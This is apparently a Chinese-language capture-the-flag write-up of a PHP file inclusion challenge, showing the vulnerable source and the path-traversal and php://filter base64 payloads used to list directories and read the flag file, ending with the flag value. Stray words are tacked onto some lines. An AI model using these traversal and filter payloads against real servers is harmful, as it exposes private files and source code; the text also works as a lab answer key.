點進連接發現提示php
include $_GET['file']
估計是文件包含漏洞html
嘗試包含index.php,發現一串base64編碼,解碼獲得編碼
<?php $a = @$_GET['file']; if (!$a) { $a = './templates/index.html'; } echo 'include $_GET[\'file\']'; if (strpos('flag',$a)!==false) { die('nonono'); } include $a; ?> <!--hint: ZGlyLnBocA== -->
繼續解碼hint,獲得dir.php,繼續嘗試包含dir.php,又是一串base64,繼續解碼spa
<?php $a = @$_GET['dir']; if(!$a){ $a = '/tmp'; } var_dump(scandir($a));
用dir參數遍歷目錄 dir.php?dir=../../../code
讀取文件 ?file=../../../ffffflag_1s_Her4htm
或者繼續僞協議讀取?file=php://filter/read=convert.base64-encode/resource=../../../ffffflag_1s_Her4 而後再base64解碼。blog
flag{8dc25fd21c52958f777ce92409e2802a}